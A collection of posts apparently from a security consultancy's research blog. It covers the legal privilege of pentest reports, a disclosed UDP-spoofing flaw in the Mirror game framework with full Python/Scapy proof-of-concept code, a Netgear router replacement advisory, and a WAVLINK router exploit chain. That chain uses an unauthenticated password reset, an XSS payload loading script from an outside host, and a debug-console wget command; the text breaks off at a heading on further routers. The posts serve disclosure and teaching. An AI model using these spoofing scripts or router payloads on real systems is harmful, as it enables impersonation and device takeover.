
Think that having your lawyer engage your penetration testing consultancy will help you? Think again.

26 October 2023 at 16:00

Guest Post: Neil Jacobs (deals with cyber law stuff)

Many companies engage their pen testing companies through their lawyers, i.e., the lawyers themselves engage the pentester (not the client), and the lawyers then provide the pen test results to the client, usually via a report. The thinking is that doing so will “cloak” the test results with attorney-client confidentiality (because the pentest report was given to the client by the lawyer, not by the pentester directly) and thus make them not discoverable in litigation. There are several reasons why this approach may be a problem!

To understand why, it’s necessary to get a bit “into the weeds” with respect to what the attorney-client relationship covers and what it doesn’t. The so-called “attorney-client privilege” has two components: first, the obligation of confidentiality that a lawyer has with respect to client communications (e.g., if a client tells a lawyer some fact in confidence, the lawyer may not, as a general matter, divulge that fact to anyone outside their office); and second, a litigation privilege that covers attorney-client communications, attorney work product, and certain other client-related materials. Both aspects of this privilege have, as their objective, the goal of protecting free and open communication between a client and lawyer so that the client can get the best possible advice. In other words, the policy behind the privilege is to promote legal advice, and the question of whether a communication is indeed privileged will depend on its relationship to the rendering of legal advice. That’s where the pentest situation gets complicated.

When an entity has the pentest contracted for by an attorney, the question of whether privilege attaches to that attorney’s communication of the results to the client is directly and substantially tied to the actual rendition of legal services. If a lawyer receives the result of the pentest and passes it on to the client with a cursory “here it is”, without providing additional legal advice, the likelihood of attorney-client privilege actually attaching to that communication is slim. The degree to which legal advice is given around the test results will determine whether privilege attaches, and this determination is very fact-specific and not automatic. Even labeling the results with an “attorney-client privileged communication” advisory may not be enough to attach the privilege if, in reality, little or no legal advice is actually given.

For example, in the case of Wengui v. Clark Hill (2021), Wengui was a Chinese dissident who hired Clark Hill to get him asylum in the US. Clark Hill was hacked shortly afterward in what was seen as a targeted attack by the Chinese government, and Wengui’s asylum application was then disclosed online. Wengui filed suit against Clark Hill for failing to protect his data. Clark Hill engaged a security consultant to understand “what happened” but refused to turn over the consultant’s report in the litigation with Wengui, claiming attorney-client privilege. The judge disagreed and forced Clark Hill to turn it over, saying, among other things, that discovering how a cyberattack occurred is a normal business function that would take place regardless of the existence of litigation.

Similarly, in Capital One Consumer Data Security Breach Litigation (2020), Capital One had retained a security consultant on a regular basis since 2015. After a major data breach, Capital One instructed its outside law firm to engage the same consultant to produce a “special report” on the breach. The consultant produced the report to the law firm, which in turn produced it to Capital One. The plaintiffs in the lawsuit sought to obtain the report, and Capital One objected on the grounds of attorney-client privilege. Again, the judge denied that claim, looking carefully at where the special report was budgeted (under “cyber expense”, not “legal”) and the degree to which the law firm did or did not take the lead in heading the investigation (not enough), and stating that the doctrine does not protect documents that would have been created in essentially similar form regardless of the litigation, i.e., pursuant to an agreement that Capital One had had in place with its security consultant for years before the breach.

So, in conclusion: the attorney-client privilege is narrower than most companies think. Take proper and full legal advice before acting.

The above does not constitute legal advice but rather the opinions of the author. Reading the within post does not create any attorney-client relationship between the author and readers. Please take individual legal advice for your situation.

From the IncludeSec team, we wanted to thank Neil for his external insight on this subject! (https://www.nijlaw.com/)

The post Think that having your lawyer engage your penetration testing consultancy will help you? Think again. appeared first on Include Security Research Blog.

Impersonating Other Players with UDP Spoofing in Mirror

18 April 2023 at 16:00

Mirror is an open-source multiplayer game framework for Unity. The history of Mirror is pretty interesting, I’d encourage anyone interested to give it a read on their site. Long story short, it was built as a replacement for UNET (which was provided by Unity but had a number of issues and was ultimately deprecated).

Mirror has a number of different transports that you can swap between, such as UDP, WebSocket, and TCP. I recently went on a deep dive into their default transport, KCP, which works over UDP.

Among other concepts, Mirror has commands, which are functions that clients can invoke on the server. Players have ownership of certain objects in the game, and users are only supposed to be able to invoke commands on objects they own. For example, a game might implement a command Player::ConsumePotion() which deletes a potion and heals the user. Each player owns their own Player object and should only be able to call this method on their own Player (otherwise you could force other users to consume all of their potions at an inopportune time). Mirror also has RPCs, which are functions that the server calls on the clients.

Both of these would require some way of authenticating clients, so Mirror can know who sent a command/RPC and whether they were authorized to do it. I was curious how Mirror implements this authentication.

Digging in to its (quite nice) source code and analyzing recorded packets with 010 Editor, I found the KCP packet structure to look like this:

  • header : byte. This header determines whether KCP considers this packet reliable (0x01) or unreliable (0x02).
  • conv_ : uint. This one always seemed to be 0 in my captures; I didn’t dig into what it’s for.
  • cmd : byte. There are a few different commands. The main one is CMD_PUSH (0x51), which “pushes” data. There are also handshake-related commands that are not important for this post.
  • frg : byte. I’m guessing this is used for fragmenting data among multiple packets. All the packets I sent were short, so it was always 0 for me and I didn’t look into it further.
  • wnd : ushort. I think it has to do with max packet size. It was 4096 for me.
  • ts : uint. Time in milliseconds since the application started running.
  • sn : uint. Might stand for “sequence number”? Mirror expects it to be the same as its rcv_nxt value (or within a certain window in case packets come out of order). Starts at 0 and increments by 1 with each message.
  • una : uint. Not sure what this is, but it always seemed to be the same as “sn”.
  • len : uint. Size of the payload.
  • kcpHeader : byte. There are a few possible values, for handshake, keepalive, and disconnect; the main one is 0x03, used to indicate sending data.
  • remoteTimestamp : double. Timestamp; it could be set arbitrarily and didn’t seem to affect anything.
  • messageTypeId : ushort. Hashed message type ID (e.g. Mirror.CommandMessage). Mirror uses a special hashing routine for these IDs; I’ll talk about that in a bit.
  • payload : bytes. The actual command or RPC data.

I was particularly interested in commands, and seeing if there was a way to trick the server into running commands for other users. In this case, the payload will be of type Mirror.CommandMessage which has this structure:

  • netId : uint. Each game object that can receive messages has a netId; they start at 0 and increment.
  • componentIndex : byte. A game object might have multiple components that can receive messages; this is the index of the targeted component.
  • functionHash : ushort. Hash of the (fully qualified) name of the function to invoke on the component, using the same hashing function mentioned above. It can’t be any function; it has to be one of the specially annotated commands or RPCs.
  • dataLen : uint. Length of all of the parameters to the function combined.
  • data : bytes. Contains the payload to the functions.

The hashing function for messageTypeId and functionHash looks like this in Python:

def get_id(typename):
    return get_stable_hashcode(typename) & 0xffff

def get_stable_hashcode(string):
    # iterating over a bytes object already yields ints
    h = 23
    for c in str.encode(string):
        h = h * 31 + c
    return h
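
Because only the low 16 bits are kept, Python’s unbounded integers agree with C#’s overflowing 32-bit arithmetic here: (h * 31 + c) mod 2**16 depends only on h mod 2**16. A quick standalone sanity check (the functions are repeated so the snippet runs on its own):

```python
def get_stable_hashcode(string):
    h = 23
    for c in string.encode():
        h = h * 31 + c
    return h

def get_id(typename):
    # only the low 16 bits survive, so 32-bit overflow in C# is irrelevant
    return get_stable_hashcode(typename) & 0xffff

# "ab": ((23 * 31 + 97) * 31 + 98) = 25208, which is already < 2**16
print(get_id("ab"))  # → 25208
```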

Notably, none of the packet fields provide any sort of authentication mechanism. A potential spoofer does have to supply the correct sn value, but since these start at 0 and increment by 1 with each message, it’s possible to brute force it. So how does Mirror determine where a packet comes from?

The KcpServer::TickIncoming() method is where incoming data is dealt with. It has the following code:

public void TickIncoming()
{
    while (socket != null && socket.Poll(0, SelectMode.SelectRead))
    {
        try
        {
            // receive
            int msgLength = ReceiveFrom(rawReceiveBuffer, out int connectionId);

The connectionId parameter is later used to look up which connection is sending data. How is it generated? KcpServer::ReceiveFrom() has this code:

// EndPoint & Receive functions can be overwritten for where-allocation:
// https://github.com/vis2k/where-allocation
protected virtual int ReceiveFrom(byte[] buffer, out int connectionHash)
{
    // NOTE: ReceiveFrom allocates.
    //   we pass our IPEndPoint to ReceiveFrom.
    //   receive from calls newClientEP.Create(socketAddr).
    //   IPEndPoint.Create always returns a new IPEndPoint.
    //   https://github.com/mono/mono/blob/f74eed4b09790a0929889ad7fc2cf96c9b6e3757/mcs/class/System/System.Net.Sockets/Socket.cs#L1761
    int read = socket.ReceiveFrom(buffer, 0, buffer.Length, SocketFlags.None, ref newClientEP);

    // calculate connectionHash from endpoint
    // NOTE: IPEndPoint.GetHashCode() allocates.
    //  it calls m_Address.GetHashCode().
    //  m_Address is an IPAddress.
    //  GetHashCode() allocates for IPv6:
    //  https://github.com/mono/mono/blob/bdd772531d379b4e78593587d15113c37edd4a64/mcs/class/referencesource/System/net/System/Net/IPAddress.cs#L699
    //
    // => using only newClientEP.Port wouldn't work, because
    //    different connections can have the same port.
    connectionHash = newClientEP.GetHashCode();
    return read;
}
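
In effect, the server trusts whatever source endpoint is stamped on the datagram. A toy Python model of this trust scheme (purely illustrative; the names are made up, not Mirror’s actual code):

```python
# Toy model of a server that, like Mirror's KCP transport, identifies
# connections solely by a hash of the packet's source (IP, port) endpoint.
connections = {}  # connection hash -> player name

def register(ip, port, player):
    connections[hash((ip, port))] = player

def handle_packet(src_ip, src_port, payload):
    # The server cannot tell a genuine datagram from a spoofed one:
    # anything bearing the right source endpoint is attributed to that player.
    player = connections.get(hash((src_ip, src_port)))
    return f"{player} sent {payload!r}"

register("192.168.0.14", 59462, "victim")

# A legitimate packet and an attacker-forged packet are indistinguishable:
legit = handle_packet("192.168.0.14", 59462, "hello")
spoofed = handle_packet("192.168.0.14", 59462, "pwned")  # forged src endpoint
```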

The IPEndPoint class consists of an IP and port. So it appears connections are authenticated based on a hash of these values. Since we’re dealing with UDP packets, it seemed that it should be possible to spoof packets from arbitrary host/port combinations and Mirror would believe them to be authentic. So far we have three caveats to this:

  • The spoofer would need to brute force the correct ‘sn’ value
  • The spoofer would need to know the player’s IP address
  • The spoofer would need to know the port that the player is using to connect to the server

The last point might be the trickiest for an attacker to obtain. RFC 6335 suggests that clients use a port in the range 49152–65535 for ephemeral ports, which leaves 16,384 possible ports the client could be using. I found an nmap UDP port scan against the client while the game was running to be effective in determining the correct port, as shown below (the game client was using port 59462). UDP port scanning is quite slow, so I only scanned a subset of the ephemeral ports.

$ sudo nmap -sU 192.168.0.14 -p59400-59500
Starting Nmap 7.80 ( https://nmap.org ) at 2022-11-04 13:15 EDT
Nmap scan report for 192.168.0.14
Host is up (0.0063s latency).
Not shown: 99 closed ports
PORT      STATE         SERVICE
59462/udp open|filtered unknown
MAC Address: [REDACTED] (Unknown)

Nmap done: 1 IP address (1 host up) scanned in 132.04 seconds

This assumes though that the attacker has access to the local network the user is on. This might be the case in an eSport or LAN party type scenario. In the case of eSports in particular, this might actually present a high impact, altering the outcome of the game with money at stake.

If an attacker did not know the correct UDP port (like when attacking a stranger over the internet), it might also be possible to brute force the port. However, the attacker would be brute forcing both the port and the sn value, which might not be feasible in a reasonable amount of time without any other data leaks that might give insight into the sn sequence value. Many ISPs also filter out spoofed packets, blocking the attack, but some may not.
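
For a rough sense of that blind search space, combining the full ephemeral port range with a window of sn values to try per port (100 here, roughly the window the PoC below uses by default):

```python
# Back-of-envelope estimate of the blind brute-force space when neither
# the client's port nor the current sn value is known.
ephemeral_ports = 65535 - 49152 + 1  # 16384 ports per RFC 6335
sn_window = 100                      # sn values tried per port (illustrative)
packets = ephemeral_ports * sn_window
print(packets)  # → 1638400
```

Over a million spoofed packets in the worst case, which is why a leak narrowing either value changes the picture considerably.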

In addition to IP and port, it’s also necessary to know the object ID (netId) and component ID of the component that will receive the message. This is game dependent, but can be constant (as in the game tested in the proof of concept below) or might depend on instantiation logic. This likely wouldn’t be too big of a barrier.

Proof of concept

I came up with a Python proof of concept for this attack using the awesome Scapy library. The code for it is at the bottom of the post. To test it, I decided to use one of the example projects the Mirror library provides, which is a chat application. The command that will be invoked by the attacker is defined as:

[Command(requiresAuthority = false)]
void CmdSend(string message, NetworkConnectionToClient sender = null)
{
    if (!connNames.ContainsKey(sender))
        connNames.Add(sender, sender.identity.GetComponent<Player>().playerName);

    if (!string.IsNullOrWhiteSpace(message))
        RpcReceive(connNames[sender], message.Trim());
}

The attack will look like this:

 _________________        _____________________________
 Server           |      |Client
 192.168.0.14:7777|<---->|192.168.0.14:????? (determine port using port scan/Wireshark)
 _________________|      |_____________________________
    ^
    |
    | Spoofed UDP packets w/IP 192.168.0.14 and port = [client port]
    |
 ___|_____________
 Attacker         |
 192.168.0.253    |
 _________________|

I ran the game in the Unity editor as the server and a Windows build as the client:

I determined the client source port using Wireshark to avoid waiting for a lengthy UDP scan (though the scan would’ve worked too). Then I ran my PoC from the attacking host using the following command (superuser privileges are needed for Scapy to send raw packets). The most important line is the one with the srchost and srcport parameters, which are spoofed to pose as the client user’s host and port.

$ ip a | grep 192
    inet 192.168.0.253/24 brd 192.168.0.255 scope global noprefixroute wlo1
$ sudo python3 spoofer.py -v \
    --dsthost 192.168.0.14 --dstport 7777 \
    --srchost 192.168.0.14 --srcport 55342 \
    --messageType command \
    --function "System.Void Mirror.Examples.Chat.ChatUI::CmdSend(System.String,Mirror.NetworkConnectionToClient)"  \
    uiopasdf
Sending packet: 010000000051000010570a000001000000010000002d00000003000000000000244094b40100000000973f18000000080073706f6f666564d2040000090061736466617364660a
.
Sent 1 packets.
Sending packet: 010000000051000010570a000002000000020000002d00000003000000000000244094b40100000000973f18000000080073706f6f666564d2040000090061736466617364660a
[Many such messages snipped for brevity ...]

This resulted in a large number of messages appearing on the players’ games, appearing to come from the client user:

Chat provided a convenient example where it was easy to show impersonation using this technique without a video. You might notice that the CmdSend function has the flag requiresAuthority=false — this means any client can call the function, so this example doesn’t prove that you can call commands on objects belonging to other users. However, I tested other examples with requiresAuthority=true and those worked as well. I did not implement or test RPC spoofing in my PoC, but based on Mirror’s code I saw no reason that RPC spoofing wouldn’t also be possible. In that case the attacker would pretend to be the server in order to invoke certain functions on the client.

Impact

The most obvious potential impact to such an attack would be cheating and user impersonation. As mentioned, in certain scenarios like eSports, this might be high stakes, but in other cases it would be a mere annoyance. Impersonating a user and doing annoying or harassing things might have social (or even legal?) repercussions for that person.

Other attacks depend heavily on the game and the functionality contained in the commands and RPCs. Perhaps an RPC might be vulnerable to XXE or shell command injection (seems unlikely but who knows). Suppose there was a command for changing levels that forced clients to load asset bundles from arbitrary URLs. An attacker could create a malicious asset bundle and force the game clients to load it.

Remediation

To prevent the attack, Mirror would need some way of verifying where packets actually came from.

One solution to prevent spoofed commands might be for the server to send a randomly-generated token to each client on connection. In future communications, the client would need to include this token with every packet, and the server would drop packets with an invalid token. For RPCs, it would need to work the other way — the client would send the server a token, and the server would have to include that in future communications.

Assuming the attacker can’t intercept communications, this would prevent the spoofed packets, since the attacker would be unable to obtain this token.
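
A minimal sketch of such a token check (all names here are hypothetical illustrations, not Mirror’s API):

```python
import secrets

# Per-connection random tokens issued by the server at connect time.
tokens = {}  # connection_id -> token

def on_connect(connection_id):
    token = secrets.token_bytes(16)
    tokens[connection_id] = token
    return token  # sent back to the client over the new connection

def accept_packet(connection_id, claimed_token):
    # Constant-time comparison avoids leaking the token via timing.
    expected = tokens.get(connection_id)
    return expected is not None and secrets.compare_digest(expected, claimed_token)

tok = on_connect(42)
assert accept_packet(42, tok)               # genuine client
assert not accept_packet(42, b"\x00" * 16)  # spoofer guessing blindly
```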

An alternative but similar solution might be for the client and server to send keys during the initial handshake, and in subsequent packets use the keys to generate an HMAC of the packet. The opposite side verifies the HMAC before accepting the packet. This solution might be more bandwidth friendly, allowing longer keys sent only with the handshake, then shorter HMACs with subsequent messages. An attacker would have to intercept the initial message to get the key, unlike in the first remediation where they could obtain it in any message.
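
Sketched with Python’s standard hmac module (again an illustration of the idea only, not an actual Mirror patch; the 8-byte truncation is an assumption):

```python
import hmac, hashlib, secrets

# Key exchanged once during the handshake (assumes the attacker
# cannot observe that initial exchange).
key = secrets.token_bytes(32)

def tag(payload: bytes) -> bytes:
    # A truncated HMAC keeps per-packet overhead small; even 8 bytes
    # leaves a 2**64 search space for a blind spoofer.
    return hmac.new(key, payload, hashlib.sha256).digest()[:8]

def verify(payload: bytes, mac: bytes) -> bool:
    return hmac.compare_digest(tag(payload), mac)

packet = b"\x01...command bytes..."
mac = tag(packet)
assert verify(packet, mac)        # authentic packet accepted
assert not verify(b"forged", mac) # tampered payload rejected
```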

Before publication, this post was shared with the Mirror team. They have backported secure cookies to KCP: https://github.com/vis2k/kcp2k/commit/ebb456a1132d971a9227c3d0e4449931f455c98c. Additionally, an encrypted transport implementation is currently under development.

Proof of concept code

spoofer.py

import argparse
import sys
import kcp_packet
import command_message
import utils

try:
    from scapy.all import *
except ImportError:
    print("Scapy module required -- pip install scapy")
    exit(1)

parser = argparse.ArgumentParser(description='Craft spoofed Mirror Commands and RPCs over KCP')
parser.add_argument('--dsthost', type=str, help="Destination IP address", required=True)
parser.add_argument('--dstport', type=int, help="Destination port", default=7777)
parser.add_argument('--srchost', type=str, help="Spoofed source IP", required=True)
parser.add_argument('--srcport', type=int, help="Spoofed source port", required=True)
parser.add_argument('--messageType', type=str, choices=["command", "rpc"], help="Message type to send", required=True)
parser.add_argument('--function', type=str, help="The function to invoke on the receiver. Must be a fully qualified function signature like this -- do not deviate, add any spaces, etc: 'System.Void Mirror.Examples.Chat.ChatUI::CmdSend(System.String,Mirror.NetworkConnectionToClient)'")
parser.add_argument('--functionId', type=int, help="alternative for specifying function to call, use the hashed ID value sent by Mirror instead of generating it. You can grab the ID by examining Mirror traffic. Must also specify parameter types though using --function with a dummy name but the correct parameter types.", default=None)
parser.add_argument('--snStart', type=int, help="start value for brute forcing the recipient's SN value", default=1)
parser.add_argument('--snEnd', type=int, help="end value for brute forcing the recipient's SN value", default=100)
parser.add_argument('--netId', type=int, help="netId of gameobject that will receive the message", default=1)
parser.add_argument('--componentId', type=int, help="componentId of component that will receive the message", default=0)
parser.add_argument('--verbose', '-v', action='store_true', )
parser.add_argument('arguments', metavar='A', type=str, nargs='+', help='Arguments to the invoked function')

args = parser.parse_args(sys.argv[1:])

def verbose_print(text):
    if args.verbose:
        print(text)

# Construct data payload per message type
data = None
if args.messageType == "command":
    # pass through --netId/--componentId rather than hardcoding them
    data = command_message.create_from_function_def(args.netId, args.componentId, args.function, args.arguments)
elif args.messageType == "rpc":
    pass # TODO

# Send a series of KCP packets with this payload to brute force the SN value
for sn in range(args.snStart, args.snEnd):
    msg = kcp_packet.create(sn=sn, data=data)

    verbose_print("Sending packet: " + msg.hex())

    packet = IP(src=args.srchost, dst=args.dsthost) / UDP(sport=args.srcport, dport=args.dstport) / msg
    send(packet)

kcp_packet.py

import struct

struct_fmt = (
    "="  # native byte order, standard sizes
    "c"  # header : byte
    "I"  # conv_ : uint
    "c"  # cmd : byte
    "c"  # frg : byte
    "H"  # wnd : ushort
    "I"  # ts : uint
    "I"  # sn : uint
    "I"  # una : uint
    "I"  # len : uint
)

packet_size = struct.calcsize(struct_fmt)

HDR_RELIABLE = b'\x01'
CMD_PUSH = b'\x51'
WINDOW = 4096

def create(header=HDR_RELIABLE, conv_=0, cmd=CMD_PUSH, frg=b'\x00', wnd=WINDOW, ts=2647, sn=1, una=None, data=b''):

    # idk what una is, but it seems to always be the same as sn in my samples,
    # so default to that unless it's been overridden
    if una is None:
        una = sn

    return struct.pack(struct_fmt, header, conv_, cmd, frg, wnd, ts, sn, una, len(data)-1) + data

def parse(packet):
    tup = struct.unpack(struct_fmt, packet[0:packet_size])
    return {
        'header': tup[0],
        'conv_': tup[1],
        'cmd': tup[2],
        'frg': tup[3],
        'wnd': tup[4],
        'ts': tup[5],
        'sn': tup[6],
        'una': tup[7],
        'data': packet[packet_size:]
    }

command_message.py

import utils
import struct

struct_fmt = (
    "="  # native byte order, standard sizes

    # really, these 3 fields should be part of kcp_packet, but when I put them
    # there it doesn't work and I'm not sure why
    "c"  # kcpHeader : byte (0x03 = data)
    "d"  # remoteTimestamp : double
    "H"  # messageTypeId : ushort -- hashed message type id (in this case Mirror.CommandMessage)

    "I"  # netId : uint
    "c"  # componentIndex : byte
    "H"  # functionHash : ushort
    "I"  # dataLen : uint
)

message_type_id = utils.get_id("Mirror.CommandMessage")

# function signature needs to be of the form:
#     System.Void Mirror.Examples.Chat.ChatUI::CmdSend(System.String,Mirror.NetworkConnectionToClient)
# for whatever command function you want to invoke. This is what Mirror expects.
# We also parse the signature to determine the different fields that need to be sent
def create_from_function_def(net_id, component_id, function_signature, params):

    function_id = utils.get_id(function_signature)
    param_types = utils.parse_param_types_from_function_def(function_signature)

    return create_from_function_id(net_id, component_id, function_id, param_types, params)

# Param types must contain full typename. E.g. System.String, System.Int32
def create_from_function_id(net_id, component_id, function_id, param_types, params):

    data = b''
    for i in range(0, len(params)):
        data = data + utils.pack_param(param_types[i], params[i])
    data = data + b'\x0a'
    return struct.pack(struct_fmt, b'\x03', 10.0, message_type_id, net_id, bytes([component_id]), function_id, len(data)) + data

def parse():
    pass

utils.py

import struct

# Take fully qualified function signature and grab parameter types of each argument, excluding
# the last one which is always a Mirror.NetworkConnectionToClient in Mirror
def parse_param_types_from_function_def(signature):
    # grab only the stuff between the parentheses
    param_str = signature[signature.find('(')+1 : -1]
    # split by ',' and remove the last one, which is always added by the recipient, not sent by the client
    return param_str.split(',')[:-1]

# turn a function parameter into bytes expected by Mirror
# e.g. string -> ushort length, char[]
def pack_param(param_type, param):
    # strings are packed as ushort len, char[]
    if param_type == "System.String":
        fmt = f"H{len(param)}s"
        return struct.pack(fmt, len(param)+1, str.encode(param))
    # integers
    elif param_type == "System.Int32":
        return struct.pack("i", int(param))
    else:
        # raise instead of silently returning None (which would crash later
        # with a confusing TypeError when the payload is concatenated)
        raise ValueError(f"do not yet know how to pack parameter of type {param_type} -- add logic to pack_param()")

#
# These methods are used to generate different IDs within Mirror used to associate
# packets with functions and types on the receiving side
#

def get_id(typename):
    return get_stable_hashcode(typename) & 0xffff

def get_stable_hashcode(string):
    h = 23
    for c in str.encode(string):
        h = h * 31 + c
    return h


Working with vendors to “fix” unfixable vulnerabilities: Netgear BR200/BR500

By Erik Cabetas

In the summer of 2021, Joel St. John was hacking on some routers and printers during his IncludeSec research time. He reported security vulnerabilities to Netgear in their BR200 router line (branded as “Netgear Insight Managed Business Router”). During subsequent internal analysis, Netgear found that the BR500 line was also affected by the same issues identified by IncludeSec. We should note that both of these product lines reached their end-of-life date in 2021, around the time we were doing this research.

Today we want to take a quick moment to discuss a different angle of the vulnerability remediation process that we think was innovative and interesting from the perspective of the consumer and product vendor: hardware product replacement as a solution for vulnerabilities. In the following link released today, you’ll find Netgear’s solution for resolving security risks for customers with regard to this case: https://kb.netgear.com/000064712/Security-Advisory-for-Multiple-Security-Vulnerabilities-on-BR200-and-BR500-PSV-2021-0286.

We won’t discuss the details of the vulnerabilities reported in this post, but suffice to say, they were typical of other SoHo-type products (e.g., CSRF, XSS, admin functionality access, etc.) but were chained in various ways such that mass exploitation is not possible (i.e., this was not wormable). Regardless of the technical details of the vulnerabilities reported, if you are an owner of a BR200 or BR500 router, you should take this chance to upgrade your product!

That last concept of “upgrade your product” for SoHo devices has traditionally been an update of firmware. This method of product upgrade can work well when you have a small company with a small set of supported products (like a Fitbit, as an example), but what happens when you’re a huge company with hundreds of products, hundreds of third parties, and thousands of business agreements? Well, then the situation gets complicated quickly, thus begging the question, “If I reach a speed bump or roadblock in my firmware fix/release cycle, how do I ensure consumers can remain safe?” or “This product is past its end-of-life date. How do we keep consumers on legacy products safe?”

While we don’t have full knowledge of the internal happenings at Netgear, it’s possible that a similar question-and-answer scenario played out at the company. As of May 19, 2022, Netgear decided to release a coupon allowing consumers to obtain a new router of the latest model, free or at a 50% discount (depending on how long you’ve owned the device), to replace the affected BR200/BR500 devices. Additionally, both affected router models were marked obsolete, and their end-of-life date hit in 2021.

We think this idea of offering a hardware product replacement as a solution for customers is fairly unique and is an interesting idea rooted in the good intention of keeping users secure. Of course it is not without pitfalls, as there is much more work required to physically replace a hardware device, but if the only options are “replace this hardware” or “have hardware with vulnerabilities”, the former wins most every time.

As large vendors seek to improve security and safety for their users in the face of the supply chain complexities common these days in the hardware world, we at IncludeSec predict that this will become a more common model, especially when considering the entire product lifecycle for commercial products and how many points in it may be static due to internal or external reasons, whether technical or business related.

For those who have the BR200/BR500 products and are looking to reduce risk, we urge you to visit Netgear’s web page and take advantage of the upgrade opportunity. That link again is: https://kb.netgear.com/000064712/Security-Advisory-for-Multiple-Security-Vulnerabilities-on-BR200-and-BR500-PSV-2021-0286

Stay safe out there folks, and kudos to all those corporations who seek to keep their users safe with product upgrades, coupons for new devices, or whatever way they can!


Drive-By Compromise: A Tale Of Four Wifi Routers

1 October 2021 at 01:58

The consumer electronics market is a mess when it comes to the topic of security, and particularly so for routers and access points. We’ve seen a stark increase in demand for device work over the past year and even some of the best-funded products make plenty of security mistakes. There are a dozen vendors selling products within any portion of this market and it is incredibly hard to discern the overall security posture of a device from a consumer’s perspective. Even security professionals struggle with this – the number one question I’ve received when I describe my security work in this space to non-security people is "Okay, then what router should I buy?" I still don’t feel like I have a good answer to that question.

¯\_(ツ)_/¯

Hacking on a router is a great way to learn about web and device security, though. This industry seems stuck in a never-ending cycle in which security is almost always an afterthought. Devices are produced at the cheapest cost manageable, and proper security testing is an expensive endeavor. Products ship full of security vulnerabilities, see support for a handful of years, and then reach end-of-life only to be replaced by the new shiny model.

For years I’ve given this as my number one recommendation to people new to infosec as a means of leveling up their skills. In late 2020, someone asked me for practical advice on improving at web application security. I told him to go buy the cheapest router he could find on Amazon and that I’d help walk him through it. This ended up being the WAVLINK AC1200, clocking in at a whopping $28 at the time.

More fun indeed

Of course, I was personally tempted to get involved, so I picked one up myself. After a couple weekends playing with the device I’d found quite a few bugs. This culminated in a solid chain of vulnerabilities that made it fairly simple to remotely compromise the device – all from simply visiting an attacker-controlled webpage (aka a ‘drive-by’ attack). This is a pretty amazing feeling, and doing this sort of work has turned into a hobby. $28 for a few weekends of fun? Cheaper than a lot of options out there!

This initial success got me excited enough that I bought a few more devices at around the same price-point. They delivered in a similar fashion, giving me quite a bit of fun during the winter months of 2020. First, though, let’s dive into the WAVLINK AC1200…

WAVLINK AC1200

When initially digging into this, I didn’t bother to check for prior work as the journey is the fun part. Several of the vulnerabilities I discovered were found independently (and earlier) by others, and some of them have been publicly disclosed. The other vulnerabilities were either disclosed in private, or caught internally by WAVLINK – the firmware released in December 2020 seems to have patched it all. If you happen to have one, you should definitely go install the updated firmware.

Alright, let’s get into it. There are a few things going on with this router:

  1. A setup wizard is not disabled after being used, letting unauthenticated callers set the device password.
  2. Cross-site request forgery (CSRF) throughout the management console.
  3. Cross-site scripting (XSS) in the setup wizard.
  4. A debug console that allows execution of arbitrary system commands.
pew pew pew

The Magical Setup Wizard

When first provisioning the device, users are met with a pretty simple setup wizard:

WAVLINK AC1200 Setup Wizard

When you save, the application sends a POST request like the following:

POST /cgi-bin/login.cgi HTTP/1.1
Host: 192.168.10.1
Content-Type: application/x-www-form-urlencoded
<HTTP headers redacted for brevity>

page=sysinit&wl_reddomain=WO&time_zone=UTC+04:00&newpass=Password123&wizardpage=/wizard.shtml&hashkey=0abdb6489f83d63a25b9a025b8a518ad&syskey=M98875&wl_reddomain1=WO&time_zone1=UTC+04:00&newpass1=supersecurepassword

Once this wizard is completed, the endpoint is not disabled, essentially allowing an attacker to re-submit the setup wizard. Since the endpoint requires no authentication, a properly formed request will succeed whenever a victim on the router’s network visits an attacker-controlled website. The request can also be slimmed down a bit, as only some of the parameters are required:

POST /cgi-bin/login.cgi HTTP/1.1
Host: 192.168.10.1
Content-Type: application/x-www-form-urlencoded
<HTTP headers redacted for brevity>

page=sysinit&newpass=<attacker-supplied password>
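As a concrete illustration, here’s a minimal Python sketch that crafts the trimmed-down request above. It only builds the raw request text and sends nothing; the endpoint and parameter names are the ones observed in the captured traffic, and the default host is the router’s stock LAN address:

```python
from urllib.parse import urlencode

def build_password_reset(new_password: str, host: str = "192.168.10.1") -> str:
    """Craft the unauthenticated setup-wizard request for the WAVLINK AC1200.

    Only the two required parameters are included; the device accepts this
    even after initial provisioning, resetting the admin password.
    """
    body = urlencode({"page": "sysinit", "newpass": new_password})
    return (
        "POST /cgi-bin/login.cgi HTTP/1.1\r\n"
        f"Host: {host}\r\n"
        "Content-Type: application/x-www-form-urlencoded\r\n"
        f"Content-Length: {len(body)}\r\n"
        "\r\n"
        f"{body}"
    )
```

In a real drive-by this request would be issued cross-origin by the victim’s browser (e.g., an auto-submitting form), not built server-side like this.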

In addition, the wizardpage parameter is vulnerable to reflected XSS and we can use a single request to pull in some extra JavaScript:

POST /cgi-bin/login.cgi HTTP/1.1
Host: 192.168.10.1
Content-Type: application/x-www-form-urlencoded
<HTTP headers redacted for brevity>

page=sysinit&newpass=hunter2&wizardpage=</script><script src="http://q.mba:1234/poc.js">//

When a victim visits our page, we can see this request in the HTTP server logs:

This additional code can be used for all sorts of nefarious purposes, but first…

Command Execution as a Service

One of the bugs that was reported on fairly extensively had to do with this lovely page, hidden in the device’s webroot:

The reports claimed that this is a backdoor, though honestly it seems more like a debug/test console to me. Regardless, it’s pretty useful for this exploit 🙂

With the additional JavaScript pulled in via XSS, we can force the targeted user into logging into the web console (with the newly set password) and then use the debug console to pull down a file:

POST /cgi-bin/adm.cgi HTTP/1.1
Host: 192.168.10.1
Content-Type: application/x-www-form-urlencoded
<HTTP headers redacted for brevity>

page=sysCMD&command=wget+http://q.mba:1234/rce.txt+-O+/etc_ro/lighttpd/www/rce.txt&SystemCommandSubmit=Apply

In this case I’m just using wget, but it would be pretty trivial to do something more meaningful here. All in all, it was quite a fun time working this out, and it proved to be a great training exercise for some folks.
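To tie the pieces together, the following Python sketch models the chain as the ordered requests an attacker’s page would need the victim’s browser to replay. This is illustrative only: the intermediate login step (using the newly set password) is omitted, and the paths and parameters are the ones shown in the captured requests above:

```python
from urllib.parse import urlencode

def wavlink_chain(new_password: str, payload_url: str):
    """Return (path, body) pairs for the WAVLINK exploit chain.

    Step 1 re-runs the setup wizard to set a known password; step 2 uses
    the debug console to fetch and stage an attacker-hosted file. The
    login request in between is omitted for brevity.
    """
    set_password = ("/cgi-bin/login.cgi",
                    urlencode({"page": "sysinit", "newpass": new_password}))
    command = "wget %s -O /etc_ro/lighttpd/www/rce.txt" % payload_url
    run_command = ("/cgi-bin/adm.cgi",
                   urlencode({"page": "sysCMD", "command": command,
                              "SystemCommandSubmit": "Apply"}))
    return [set_password, run_command]
```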

Cudy and Tenda

